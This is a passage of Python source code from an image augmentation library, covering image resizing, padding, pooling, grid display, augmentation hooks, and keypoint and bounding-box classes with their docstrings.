result_img = cv2.resize(images[img_idx], (width, height), interpolation=ip)
if len(result_img.shape) == 2:
result_img = result_img[:, :, np.newaxis]
result[img_idx] = result_img.astype(images.dtype)
return result
def imresize_single_image(image, sizes, interpolation=None):
"""
Resizes a single image.
Parameters
----------
image : (H,W,C) ndarray or (H,W) ndarray
Array of the image to resize.
Expected to usually be of dtype uint8.
sizes : float or iterable of two ints or iterable of two floats
See `imresize_many_images()`.
interpolation : None or string or int, optional(default=None)
See `imresize_many_images()`.
Returns
-------
out : (H',W',C) ndarray or (H',W') ndarray
The resized image.
"""
grayscale = False
if image.ndim == 2:
grayscale = True
image = image[:, :, np.newaxis]
do_assert(len(image.shape) == 3, image.shape)
rs = imresize_many_images(image[np.newaxis, :, :, :], sizes, interpolation=interpolation)
if grayscale:
return np.squeeze(rs[0, :, :, 0])
else:
return rs[0, ...]
def pad(arr, top=0, right=0, bottom=0, left=0, mode="constant", cval=0):
"""
Pad an image-like array on its top/right/bottom/left side.
This function is a wrapper around `numpy.pad()`.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array to pad.
top : int, optional(default=0)
Amount of pixels to add at the top side of the image. Must be 0 or greater.
right : int, optional(default=0)
Amount of pixels to add at the right side of the image. Must be 0 or greater.
bottom : int, optional(default=0)
Amount of pixels to add at the bottom side of the image. Must be 0 or greater.
left : int, optional(default=0)
Amount of pixels to add at the left side of the image. Must be 0 or greater.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
Returns
-------
arr_pad : (H',W') or (H',W',C) ndarray
Padded array with height H'=H+top+bottom and width W'=W+left+right.
"""
assert arr.ndim in [2, 3]
assert top >= 0
assert right >= 0
assert bottom >= 0
assert left >= 0
if top > 0 or right > 0 or bottom > 0 or left > 0:
paddings_np = [(top, bottom), (left, right)] # paddings for 2d case
if arr.ndim == 3:
paddings_np.append((0, 0)) # add paddings for 3d case
if mode == "constant":
arr_pad = np.pad(
arr,
paddings_np,
mode=mode,
constant_values=cval
)
else:
arr_pad = np.pad(
arr,
paddings_np,
mode=mode
)
return arr_pad
else:
return np.copy(arr)
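# Illustrative sketch (hypothetical helper, not called anywhere in this module):
# padding a small array by one pixel on every side with a constant value.
def _example_pad():
    arr = np.zeros((2, 2), dtype=np.uint8)
    arr_pad = pad(arr, top=1, right=1, bottom=1, left=1, mode="constant", cval=255)
    # arr_pad has shape (4, 4); the original 2x2 block sits in the center and
    # the border pixels are all 255.
    return arr_pad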
def compute_paddings_for_aspect_ratio(arr, aspect_ratio):
"""
Compute the amount of pixels by which an array has to be padded to fulfill an aspect ratio.
The aspect ratio is given as width/height.
Depending on which dimension is smaller (height or width), only the corresponding
sides (left/right or top/bottom) will be padded. In each case, both of the sides will
be padded equally.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array for which to compute pad amounts.
aspect_ratio : float
Target aspect ratio, given as width/height. E.g. 2.0 denotes the image having twice
as much width as height.
Returns
-------
result : tuple of ints
        Required padding amounts to reach the target aspect ratio, given as a tuple
of the form (top, right, bottom, left).
"""
assert arr.ndim in [2, 3]
assert aspect_ratio > 0
height, width = arr.shape[0:2]
assert height > 0
aspect_ratio_current = width / height
pad_top = 0
pad_right = 0
pad_bottom = 0
pad_left = 0
if aspect_ratio_current < aspect_ratio:
# vertical image, height > width
diff = (aspect_ratio * height) - width
pad_right = int(np.ceil(diff / 2))
pad_left = int(np.floor(diff / 2))
elif aspect_ratio_current > aspect_ratio:
# horizontal image, width > height
diff = ((1/aspect_ratio) * width) - height
pad_top = int(np.ceil(diff / 2))
pad_bottom = int(np.floor(diff / 2))
return (pad_top, pad_right, pad_bottom, pad_left)
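# Illustrative worked example (hypothetical values, nothing here is executed):
# for a (H, W) = (100, 150) array and a target aspect ratio of 2.0, the current
# ratio is 150/100 = 1.5 < 2.0, so only the width is padded:
# diff = 2.0*100 - 150 = 50, giving (top, right, bottom, left) = (0, 25, 0, 25).
#
#   compute_paddings_for_aspect_ratio(np.zeros((100, 150)), 2.0)  # (0, 25, 0, 25)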
def pad_to_aspect_ratio(arr, aspect_ratio, mode="constant", cval=0, return_pad_amounts=False):
"""
Pad an image-like array on its sides so that it matches a target aspect ratio.
Depending on which dimension is smaller (height or width), only the corresponding
sides (left/right or top/bottom) will be padded. In each case, both of the sides will
be padded equally.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array to pad.
aspect_ratio : float
Target aspect ratio, given as width/height. E.g. 2.0 denotes the image having twice
as much width as height.
mode : string, optional(default="constant")
Padding mode to use. See `numpy.pad()` for details.
cval : number, optional(default=0)
Value to use for padding if mode="constant". See `numpy.pad()` for details.
return_pad_amounts : bool, optional(default=False)
If False, then only the padded image will be returned. If True, a tuple with two
entries will be returned, where the first entry is the padded image and the second
entry are the amounts by which each image side was padded. These amounts are again a
tuple of the form (top, right, bottom, left), with each value being an integer.
Returns
-------
result : tuple
        First tuple entry: Padded image as (H',W') or (H',W',C) ndarray, fulfilling the given
aspect_ratio.
Second tuple entry: Amounts by which the image was padded on each side, given
as a tuple (top, right, bottom, left).
If return_pad_amounts is False, then only the image is returned.
"""
pad_top, pad_right, pad_bottom, pad_left = compute_paddings_for_aspect_ratio(arr, aspect_ratio)
arr_padded = pad(
arr,
top=pad_top,
right=pad_right,
bottom=pad_bottom,
left=pad_left,
mode=mode,
cval=cval
)
if return_pad_amounts:
return arr_padded, (pad_top, pad_right, pad_bottom, pad_left)
else:
return arr_padded
def pool(arr, block_size, func, cval=0, preserve_dtype=True):
"""
Rescale an array by pooling values within blocks.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array to pool. Ideally of datatype np.float64.
block_size : int or tuple of two ints or tuple of three ints
        Spatial size of each group of values to pool, aka kernel size.
If a single integer, then a symmetric block of that size along height and width will
be used.
If a tuple of two values, it is assumed to be the block size along height and width
of the image-like, with pooling happening per channel.
        If a tuple of three values, it is assumed to be the block size along height, width and
channels.
func : callable
Function to apply to a given block in order to convert it to a single number,
e.g. np.average, np.min, np.max.
cval : number, optional(default=0)
Value to use in order to pad the array along its border if the array cannot be divided
by block_size without remainder.
preserve_dtype : bool, optional(default=True)
Whether to convert the array back to the input datatype if it is changed away from
that in the pooling process.
Returns
-------
arr_reduced : (H',W') or (H',W',C') ndarray
Array after pooling.
"""
assert arr.ndim in [2, 3]
is_valid_int = is_single_integer(block_size) and block_size >= 1
    is_valid_tuple = is_iterable(block_size) and len(block_size) in [2, 3] and all([is_single_integer(val) and val >= 1 for val in block_size])
assert is_valid_int or is_valid_tuple
if is_single_integer(block_size):
block_size = [block_size, block_size]
if len(block_size) < arr.ndim:
block_size = list(block_size) + [1]
input_dtype = arr.dtype
arr_reduced = skimage.measure.block_reduce(arr, tuple(block_size), func, cval=cval)
if preserve_dtype and arr_reduced.dtype.type != input_dtype:
arr_reduced = arr_reduced.astype(input_dtype)
return arr_reduced
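# Illustrative sketch (hypothetical helper, not called anywhere in this module):
# average-pooling a 4x4 array with a 2x2 kernel halves both spatial dimensions.
def _example_pool():
    arr = np.arange(16).reshape(4, 4).astype(np.float64)
    arr_pooled = pool(arr, 2, np.average)
    # arr_pooled has shape (2, 2); its top-left value is the mean of
    # [[0, 1], [4, 5]], i.e. 2.5.
    return arr_pooled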
def avg_pool(arr, block_size, cval=0, preserve_dtype=True):
"""
Rescale an array using average pooling.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array to pool. See `pool()` for details.
block_size : int or tuple of two ints or tuple of three ints
Size of each block of values to pool. See `pool()` for details.
cval : number, optional(default=0)
Padding value. See `pool()` for details.
preserve_dtype : bool, optional(default=True)
Whether to preserve the input array dtype. See `pool()` for details.
Returns
-------
arr_reduced : (H',W') or (H',W',C') ndarray
Array after average pooling.
"""
return pool(arr, block_size, np.average, cval=cval, preserve_dtype=preserve_dtype)
def max_pool(arr, block_size, cval=0, preserve_dtype=True):
"""
Rescale an array using max-pooling.
Parameters
----------
arr : (H,W) or (H,W,C) ndarray
Image-like array to pool. See `pool()` for details.
block_size : int or tuple of two ints or tuple of three ints
Size of each block of values to pool. See `pool()` for details.
cval : number, optional(default=0)
Padding value. See `pool()` for details.
preserve_dtype : bool, optional(default=True)
Whether to preserve the input array dtype. See `pool()` for details.
Returns
-------
arr_reduced : (H',W') or (H',W',C') ndarray
Array after max-pooling.
"""
return pool(arr, block_size, np.max, cval=cval, preserve_dtype=preserve_dtype)
def draw_grid(images, rows=None, cols=None):
"""
Converts multiple input images into a single image showing them in a grid.
Parameters
----------
images : (N,H,W,3) ndarray or iterable of (H,W,3) array
The input images to convert to a grid.
Expected to be RGB and have dtype uint8.
rows : None or int, optional(default=None)
The number of rows to show in the grid.
If None, it will be automatically derived.
cols : None or int, optional(default=None)
The number of cols to show in the grid.
If None, it will be automatically derived.
Returns
-------
grid : (H',W',3) ndarray
Image of the generated grid.
"""
if is_np_array(images):
do_assert(images.ndim == 4)
else:
do_assert(is_iterable(images) and is_np_array(images[0]) and images[0].ndim == 3)
nb_images = len(images)
do_assert(nb_images > 0)
cell_height = max([image.shape[0] for image in images])
cell_width = max([image.shape[1] for image in images])
channels = set([image.shape[2] for image in images])
do_assert(len(channels) == 1, "All images are expected to have the same number of channels, but got channel set %s with length %d instead." % (str(channels), len(channels)))
nb_channels = list(channels)[0]
if rows is None and cols is None:
rows = cols = int(math.ceil(math.sqrt(nb_images)))
elif rows is not None:
cols = int(math.ceil(nb_images / rows))
elif cols is not None:
rows = int(math.ceil(nb_images / cols))
do_assert(rows * cols >= nb_images)
width = cell_width * cols
height = cell_height * rows
grid = np.zeros((height, width, nb_channels), dtype=np.uint8)
cell_idx = 0
for row_idx in sm.xrange(rows):
for col_idx in sm.xrange(cols):
if cell_idx < nb_images:
image = images[cell_idx]
cell_y1 = cell_height * row_idx
cell_y2 = cell_y1 + image.shape[0]
cell_x1 = cell_width * col_idx
cell_x2 = cell_x1 + image.shape[1]
grid[cell_y1:cell_y2, cell_x1:cell_x2, :] = image
cell_idx += 1
return grid
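# Illustrative sketch (hypothetical helper, not called anywhere in this module):
# arranging four 16x16 RGB images into a 2x2 grid yields a 32x32 grid image.
def _example_draw_grid():
    images = np.zeros((4, 16, 16, 3), dtype=np.uint8)
    grid = draw_grid(images, rows=2, cols=2)
    # grid has shape (32, 32, 3): 2 rows * cell height 16 by 2 cols * cell width 16.
    return grid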
def show_grid(images, rows=None, cols=None):
"""
Converts the input images to a grid image and shows it in a new window.
This function wraps around scipy.misc.imshow(), which requires the
`see <image>` command to work. On Windows systems, this tends to not be
the case.
Parameters
----------
images : (N,H,W,3) ndarray or iterable of (H,W,3) array
See `draw_grid()`.
rows : None or int, optional(default=None)
See `draw_grid()`.
cols : None or int, optional(default=None)
See `draw_grid()`.
"""
grid = draw_grid(images, rows=rows, cols=cols)
misc.imshow(grid)
def do_assert(condition, message="Assertion failed."):
"""
Function that behaves equally to an `assert` statement, but raises an
Exception.
This is added because `assert` statements are removed in optimized code.
It replaces `assert` statements throughout the library that should be
kept even in optimized code.
Parameters
----------
condition : bool
If False, an exception is raised.
message : string, optional(default="Assertion failed.")
Error message.
"""
if not condition:
raise AssertionError(str(message))
class HooksImages(object):
"""
Class to intervene with image augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
Parameters
----------
activator : None or callable, optional(default=None)
A function that gives permission to execute an augmenter.
The expected interface is `f(images, augmenter, parents, default)`,
where `images` are the input images to augment, `augmenter` is the
instance of the augmenter to execute, `parents` are previously
executed augmenters and `default` is an expected default value to be
returned if the activator function does not plan to make a decision
for the given inputs.
propagator : None or callable, optional(default=None)
A function that gives permission to propagate the augmentation further
to the children of an augmenter. This happens after the activator.
In theory, an augmenter may augment images itself (if allowed by the
activator) and then execute child augmenters afterwards (if allowed by
the propagator). If the activator returned False, the propagation step
will never be executed.
The expected interface is `f(images, augmenter, parents, default)`,
with all arguments having identical meaning to the activator.
preprocessor : None or callable, optional(default=None)
A function to call before an augmenter performed any augmentations.
The interface is `f(images, augmenter, parents)`,
with all arguments having identical meaning to the activator.
It is expected to return the input images, optionally modified.
postprocessor : None or callable, optional(default=None)
A function to call after an augmenter performed augmentations.
The interface is the same as for the preprocessor.
Examples
--------
>>> seq = iaa.Sequential([
>>> iaa.GaussianBlur(3.0, name="blur"),
>>> iaa.Dropout(0.05, name="dropout"),
>>> iaa.Affine(translate_px=-5, name="affine")
>>> ])
>>>
>>> def activator(images, augmenter, parents, default):
>>> return False if augmenter.name in ["blur", "dropout"] else default
>>>
>>> seq_det = seq.to_deterministic()
>>> images_aug = seq_det.augment_images(images)
>>> heatmaps_aug = seq_det.augment_images(
>>> heatmaps,
>>> hooks=ia.HooksImages(activator=activator)
>>> )
This augments images and their respective heatmaps in the same way.
The heatmaps however are only modified by Affine, not by GaussianBlur or
Dropout.
"""
#def __init__(self, activator=None, propagator=None, preprocessor=None, postprocessor=None, propagation_method=None):
def __init__(self, activator=None, propagator=None, preprocessor=None, postprocessor=None):
self.activator = activator
self.propagator = propagator
self.preprocessor = preprocessor
self.postprocessor = postprocessor
#self.propagation_method = propagation_method
def is_activated(self, images, augmenter, parents, default):
"""
Returns whether an augmenter may be executed.
Returns
-------
out : bool
If True, the augmenter may be executed. If False, it may
not be executed.
"""
if self.activator is None:
return default
else:
return self.activator(images, augmenter, parents, default)
# TODO is a propagating hook necessary? seems to be covered by activated
# hook already
def is_propagating(self, images, augmenter, parents, default):
"""
Returns whether an augmenter may call its children to augment an
        image. This is independent of the augmenter itself possibly changing
        the image without calling its children. (Most (all?) augmenters with
        children currently don't perform any changes themselves.)
Returns
-------
out : bool
If True, the augmenter may be propagate to its children.
If False, it may not.
"""
if self.propagator is None:
return default
else:
return self.propagator(images, augmenter, parents, default)
#def get_propagation_method(self, images, augmenter, parents, child, default):
# if self.propagation_method is None:
# return default
# else:
# return self.propagation_method(images, augmenter, parents, child, default)
def preprocess(self, images, augmenter, parents):
"""
A function to be called before the augmentation of images starts (per
augmenter).
Returns
-------
out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The input images, optionally modified.
"""
if self.preprocessor is None:
return images
else:
return self.preprocessor(images, augmenter, parents)
def postprocess(self, images, augmenter, parents):
"""
A function to be called after the augmentation of images was
performed.
Returns
-------
out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The input images, optionally modified.
"""
if self.postprocessor is None:
return images
else:
return self.postprocessor(images, augmenter, parents)
class HooksHeatmaps(HooksImages):
"""
Class to intervene with heatmap augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
This class is currently the same as the one for images. This may or may
not change in the future.
"""
pass
class HooksKeypoints(HooksImages):
"""
Class to intervene with keypoint augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
This class is currently the same as the one for images. This may or may
not change in the future.
"""
pass
class Keypoint(object):
"""
A single keypoint (aka landmark) on an image.
Parameters
----------
x : number
Coordinate of the keypoint on the x axis.
y : number
Coordinate of the keypoint on the y axis.
"""
def __init__(self, x, y):
# these checks are currently removed because they are very slow for some
# reason
#assert is_single_integer(x), type(x)
#assert is_single_integer(y), type(y)
self.x = x
self.y = y
@property
def x_int(self):
"""
Return the keypoint's x-coordinate, rounded to the closest integer.
Returns
-------
result : int
Keypoint's x-coordinate, rounded to the closest integer.
"""
return int(round(self.x))
@property
def y_int(self):
"""
Return the keypoint's y-coordinate, rounded to the closest integer.
Returns
-------
result : int
Keypoint's y-coordinate, rounded to the closest integer.
"""
return int(round(self.y))
def project(self, from_shape, to_shape):
"""
Project the keypoint onto a new position on a new image.
E.g. if the keypoint is on its original image at x=(10 of 100 pixels)
and y=(20 of 100 pixels) and is projected onto a new image with
size (width=200, height=200), its new position will be (20, 40).
This is intended for cases where the original image is resized.
It cannot be used for more complex changes (e.g. padding, cropping).
Parameters
----------
from_shape : tuple
Shape of the original image. (Before resize.)
to_shape : tuple
Shape of the new image. (After resize.)
Returns
-------
out : Keypoint
Keypoint object with new coordinates.
"""
if from_shape[0:2] == to_shape[0:2]:
return Keypoint(x=self.x, y=self.y)
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
x = (self.x / from_width) * to_width
y = (self.y / from_height) * to_height
return Keypoint(x=x, y=y)
def shift(self, x=0, y=0):
"""
Move the keypoint around on an image.
Parameters
----------
x : number, optional(default=0)
Move by this value on the x axis.
y : number, optional(default=0)
Move by this value on the y axis.
Returns
-------
out : Keypoint
Keypoint object with new coordinates.
"""
return Keypoint(self.x + x, self.y + y)
def __repr__(self):
return self.__str__()
def __str__(self):
return "Keypoint(x=%.8f, y=%.8f)" % (self.x, self.y)
class KeypointsOnImage(object):
"""
Object that represents all keypoints on a single image.
Parameters
----------
keypoints : list of Keypoint
List of keypoints on the image.
shape : tuple of int
The shape of the image on which the keypoints are placed.
Examples
--------
>>> kps = [Keypoint(x=10, y=20), Keypoint(x=34, y=60)]
>>> kps_oi = KeypointsOnImage(kps, shape=image.shape)
"""
def __init__(self, keypoints, shape):
#assert len(shape) == 3, "KeypointsOnImage requires shape tuples of form (H, W, C) but got %s. Use C=1 for 2-dimensional images." % (str(shape),)
self.keypoints = keypoints
if is_np_array(shape):
self.shape = shape.shape
else:
do_assert(isinstance(shape, (tuple, list)))
self.shape = tuple(shape)
@property
def height(self):
return self.shape[0]
@property
def width(self):
return self.shape[1]
@property
def empty(self):
"""
Returns whether this object contains zero keypoints.
Returns
-------
result : bool
True if this object contains zero keypoints.
"""
return len(self.keypoints) == 0
def on(self, image):
"""
Project keypoints from one image to a new one.
Parameters
----------
image : ndarray or tuple
New image onto which the keypoints are to be projected.
May also simply be that new image's shape tuple.
Returns
-------
keypoints : KeypointsOnImage
Object containing all projected keypoints.
"""
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
keypoints = [kp.project(self.shape, shape) for kp in self.keypoints]
return KeypointsOnImage(keypoints, shape)
def draw_on_image(self, image, color=[0, 255, 0], size=3, copy=True, raise_if_out_of_image=False): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw all keypoints onto a given image. Each keypoint is marked by a
square of a chosen color and size.
Parameters
----------
image : (H,W,3) ndarray
The image onto which to draw the keypoints.
This image should usually have the same shape as
set in KeypointsOnImage.shape.
color : int or list of ints or tuple of ints or (3,) ndarray, optional(default=[0, 255, 0])
The RGB color of all keypoints. If a single int `C`, then that is
equivalent to (C,C,C).
size : int, optional(default=3)
The size of each point. If set to C, each square will have
size CxC.
copy : bool, optional(default=True)
Whether to copy the image before drawing the points.
raise_if_out_of_image : bool, optional(default=False)
Whether to raise an exception if any keypoint is outside of the
image.
Returns
-------
image : (H,W,3) ndarray
Image with drawn keypoints.
"""
if copy:
image = np.copy(image)
height, width = image.shape[0:2]
for keypoint in self.keypoints:
y, x = keypoint.y_int, keypoint.x_int
if 0 <= y < height and 0 <= x < width:
x1 = max(x - size//2, 0)
x2 = min(x + 1 + size//2, width)
y1 = max(y - size//2, 0)
y2 = min(y + 1 + size//2, height)
image[y1:y2, x1:x2] = color
else:
if raise_if_out_of_image:
raise Exception("Cannot draw keypoint x=%.8f, y=%.8f on image with shape %s." % (y, x, image.shape))
return image
def shift(self, x=0, y=0):
"""
Move the keypoints around on an image.
Parameters
----------
x : number, optional(default=0)
Move each keypoint by this value on the x axis.
y : number, optional(default=0)
Move each keypoint by this value on the y axis.
Returns
-------
out : KeypointsOnImage
Keypoints after moving them.
"""
keypoints = [keypoint.shift(x=x, y=y) for keypoint in self.keypoints]
return KeypointsOnImage(keypoints, self.shape)
def get_coords_array(self):
"""
Convert the coordinates of all keypoints in this object to
an array of shape (N,2).
Returns
-------
result : (N, 2) ndarray
Where N is the number of keypoints. Each first value is the
x coordinate, each second value is the y coordinate.
"""
result = np.zeros((len(self.keypoints), 2), np.float32)
for i, keypoint in enumerate(self.keypoints):
result[i, 0] = keypoint.x
result[i, 1] = keypoint.y
return result
@staticmethod
def from_coords_array(coords, shape):
"""
Convert an array (N,2) with a given image shape to a KeypointsOnImage
object.
Parameters
----------
coords : (N, 2) ndarray
Coordinates of N keypoints on the original image.
Each first entry (i, 0) is expected to be the x coordinate.
Each second entry (i, 1) is expected to be the y coordinate.
shape : tuple
Shape tuple of the image on which the keypoints are placed.
Returns
-------
out : KeypointsOnImage
KeypointsOnImage object that contains all keypoints from the array.
"""
keypoints = [Keypoint(x=coords[i, 0], y=coords[i, 1]) for i in sm.xrange(coords.shape[0])]
return KeypointsOnImage(keypoints, shape)
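    # Illustrative round trip (hypothetical values, nothing here is executed):
    #
    #   kps = KeypointsOnImage([Keypoint(x=10, y=20)], shape=(100, 100, 3))
    #   arr = kps.get_coords_array()    # array([[10., 20.]], dtype=float32)
    #   kps2 = KeypointsOnImage.from_coords_array(arr, shape=(100, 100, 3))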
def to_keypoint_image(self, size=1):
"""
Draws a new black image of shape (H,W,N) in which all keypoint coordinates
are set to 255.
(H=shape height, W=shape width, N=number of keypoints)
This function can be used as a helper when augmenting keypoints with
a method that only supports the augmentation of images.
Parameters
        ----------
size : int
Size of each (squared) point.
Returns
-------
image : (H,W,N) ndarray
Image in which the keypoints are marked. H is the height,
defined in KeypointsOnImage.shape[0] (analogous W). N is the
number of keypoints.
"""
do_assert(len(self.keypoints) > 0)
height, width = self.shape[0:2]
image = np.zeros((height, width, len(self.keypoints)), dtype=np.uint8)
do_assert(size % 2 != 0)
sizeh = max(0, (size-1)//2)
for i, keypoint in enumerate(self.keypoints):
# TODO for float values spread activation over several cells
# here and do voting at the end
y = keypoint.y_int
x = keypoint.x_int
x1 = np.clip(x - sizeh, 0, width-1)
x2 = np.clip(x + sizeh + 1, 0, width)
y1 = np.clip(y - sizeh, 0, height-1)
y2 = np.clip(y + sizeh + 1, 0, height)
#if 0 <= y < height and 0 <= x < width:
# image[y, x, i] = 255
if x1 < x2 and y1 < y2:
image[y1:y2, x1:x2, i] = 128
if 0 <= y < height and 0 <= x < width:
image[y, x, i] = 255
return image
@staticmethod
def from_keypoint_image(image, if_not_found_coords={"x": -1, "y": -1}, threshold=1, nb_channels=None): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Convert an image generated by `to_keypoint_image()` back to
a KeypointsOnImage object.
Parameters
----------
image : (H,W,N) ndarray
The keypoints image. N is the number of
keypoints.
if_not_found_coords : tuple or list or dict or None
Coordinates to use for keypoints that cannot be found in `image`.
If this is a list/tuple, it must have two integer values. If it
is a dictionary, it must have the keys "x" and "y". If this
is None, then the keypoint will not be added to the final
KeypointsOnImage object.
threshold : int
The search for keypoints works by searching for the argmax in
each channel. This parameter contains the minimum value that
the max must have in order to be viewed as a keypoint.
nb_channels : None or int
Number of channels of the image on which the keypoints are placed.
Some keypoint augmenters require that information.
If set to None, the keypoint's shape will be set
to `(height, width)`, otherwise `(height, width, nb_channels)`.
Returns
-------
out : KeypointsOnImage
The extracted keypoints.
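Examples
--------
A round-trip sketch via a keypoint image (coordinates and image size are
illustrative):
>>> kps_oi = KeypointsOnImage([Keypoint(x=10, y=20)], shape=(64, 64, 3))
>>> kp_image = kps_oi.to_keypoint_image(size=1)
>>> kps_recovered = KeypointsOnImage.from_keypoint_image(kp_image, nb_channels=3)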
"""
do_assert(len(image.shape) == 3)
height, width, nb_keypoints = image.shape
drop_if_not_found = False
if if_not_found_coords is None:
drop_if_not_found = True
if_not_found_x = -1
if_not_found_y = -1
elif isinstance(if_not_found_coords, (tuple, list)):
do_assert(len(if_not_found_coords) == 2)
if_not_found_x = if_not_found_coords[0]
if_not_found_y = if_not_found_coords[1]
elif isinstance(if_not_found_coords, dict):
if_not_found_x = if_not_found_coords["x"]
if_not_found_y = if_not_found_coords["y"]
else:
raise Exception("Expected if_not_found_coords to be None or tuple or list or dict, got %s." % (type(if_not_found_coords),))
keypoints = []
for i in sm.xrange(nb_keypoints):
maxidx_flat = np.argmax(image[..., i])
maxidx_ndim = np.unravel_index(maxidx_flat, (height, width))
found = (image[maxidx_ndim[0], maxidx_ndim[1], i] >= threshold)
if found:
keypoints.append(Keypoint(x=maxidx_ndim[1], y=maxidx_ndim[0]))
else:
if drop_if_not_found:
pass # dont add the keypoint to the result list, i.e. drop it
else:
keypoints.append(Keypoint(x=if_not_found_x, y=if_not_found_y))
out_shape = (height, width)
if nb_channels is not None:
out_shape += (nb_channels,)
return KeypointsOnImage(keypoints, shape=out_shape)
def copy(self):
"""
Create a shallow copy of the KeypointsOnImage object.
Returns
-------
out : KeypointsOnImage
Shallow copy.
"""
return copy.copy(self)
def deepcopy(self):
"""
Create a deep copy of the KeypointsOnImage object.
Returns
-------
out : KeypointsOnImage
Deep copy.
"""
# for some reason deepcopy is way slower here than manual copy
#return copy.deepcopy(self)
kps = [Keypoint(x=kp.x, y=kp.y) for kp in self.keypoints]
return KeypointsOnImage(kps, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
return "KeypointsOnImage(%s, shape=%s)" % (str(self.keypoints), self.shape)
# TODO functions: square(), to_aspect_ratio(), extend()/add_border(), contains_point()
class BoundingBox(object):
"""
Class representing bounding boxes.
Each bounding box is parameterized by its top left and bottom right corners. Both are given
as x and y-coordinates.
Parameters
----------
x1 : number
X-coordinate of the top left of the bounding box.
y1 : number
Y-coordinate of the top left of the bounding box.
x2 : number
X-coordinate of the bottom right of the bounding box.
y2 : number
Y-coordinate of the bottom right of the bounding box.
label : None or string, optional(default=None)
Optional label to attach to the bounding box, e.g. a class name.
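Examples
--------
A small construction sketch (all coordinates are illustrative):
>>> bb = BoundingBox(x1=10, y1=20, x2=40, y2=60)
>>> bb_larger = bb.extend(all_sides=5)
>>> bb_shifted = bb.shift(left=10)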
"""
def __init__(self, x1, y1, x2, y2, label=None):
"""Create a new BoundingBox instance."""
if x1 > x2:
x2, x1 = x1, x2
do_assert(x2 > x1)
if y1 > y2:
y2, y1 = y1, y2
do_assert(y2 > y1)
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.label = label
@property
def x1_int(self):
"""
Return the x-coordinate of the top left corner as an integer.
Returns
-------
result : int
X-coordinate of the top left corner, rounded to the closest integer.
"""
return int(round(self.x1))
@property
def y1_int(self):
"""
Return the y-coordinate of the top left corner as an integer.
Returns
-------
result : int
Y-coordinate of the top left corner, rounded to the closest integer.
"""
return int(round(self.y1))
@property
def x2_int(self):
"""
Return the x-coordinate of the bottom right corner as an integer.
Returns
-------
result : int
X-coordinate of the bottom right corner, rounded to the closest integer.
"""
return int(round(self.x2))
@property
def y2_int(self):
"""
Return the y-coordinate of the bottom right corner as an integer.
Returns
-------
result : int
Y-coordinate of the bottom right corner, rounded to the closest integer.
"""
return int(round(self.y2))
@property
def height(self):
"""
Estimate the height of the bounding box.
Returns
-------
result : number
Height of the bounding box.
"""
return self.y2 - self.y1
@property
def width(self):
"""
Estimate the width of the bounding box.
Returns
-------
result : number
Width of the bounding box.
"""
return self.x2 - self.x1
@property
def center_x(self):
"""
Estimate the x-coordinate of the center point of the bounding box.
Returns
-------
result : number
X-coordinate of the center point of the bounding box.
"""
return self.x1 + self.width/2
@property
def center_y(self):
"""
Estimate the y-coordinate of the center point of the bounding box.
Returns
-------
result : number
Y-coordinate of the center point of the bounding box.
"""
return self.y1 + self.height/2
@property
def area(self):
"""
Estimate the area of the bounding box.
Returns
-------
result : number
Area of the bounding box, i.e. `height * width`.
"""
return self.height * self.width
def project(self, from_shape, to_shape):
"""
Project the bounding box onto a new position on a new image.
E.g. if the bounding box is on its original image at
x1=(10 of 100 pixels) and y1=(20 of 100 pixels) and is projected onto
a new image with size (width=200, height=200), its new position will
be (x1=20, y1=40). (Analogous for x2/y2.)
This is intended for cases where the original image is resized.
It cannot be used for more complex changes (e.g. padding, cropping).
Parameters
----------
from_shape : tuple
Shape of the original image. (Before resize.)
to_shape : tuple
Shape of the new image. (After resize.)
Returns
-------
out : BoundingBox
BoundingBox object with new coordinates.
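Examples
--------
A sketch of projecting a box from a 100x100 image onto a 200x200 image
(shapes are illustrative):
>>> bb = BoundingBox(x1=10, y1=20, x2=30, y2=40)
>>> bb_proj = bb.project(from_shape=(100, 100), to_shape=(200, 200))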
"""
if from_shape[0:2] == to_shape[0:2]:
return self.copy()
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
do_assert(from_height > 0)
do_assert(from_width > 0)
do_assert(to_height > 0)
do_assert(to_width > 0)
x1 = (self.x1 / from_width) * to_width
y1 = (self.y1 / from_height) * to_height
x2 = (self.x2 / from_width) * to_width
y2 = (self.y2 / from_height) * to_height
return self.copy(
x1=x1,
y1=y1,
x2=x2,
y2=y2,
label=self.label
)
def extend(self, all_sides=0, top=0, right=0, bottom=0, left=0):
"""
Extend the size of the bounding box along its sides.
Parameters
----------
all_sides : number, optional(default=0)
Value by which to extend the bounding box size along all sides.
top : number, optional(default=0)
Value by which to extend the bounding box size along its top side.
right : number, optional(default=0)
Value by which to extend the bounding box size along its right side.
bottom : number, optional(default=0)
Value by which to extend the bounding box size along its bottom side.
left : number, optional(default=0)
Value by which to extend the bounding box size along its left side.
Returns
-------
result : BoundingBox
Extended bounding box.
"""
return BoundingBox(
x1=self.x1 - all_sides - left,
x2=self.x2 + all_sides + right,
y1=self.y1 - all_sides - top,
y2=self.y2 + all_sides + bottom
)
def intersection(self, other, default=None):
"""
Compute the intersection bounding box of this bounding box and another one.
Parameters
----------
other : BoundingBox
Other bounding box with which to generate the intersection.
default : any, optional(default=None)
Value to return if the two bounding boxes do not intersect.
Returns
-------
result : BoundingBox
Intersection bounding box of the two bounding boxes.
"""
x1_i = max(self.x1, other.x1)
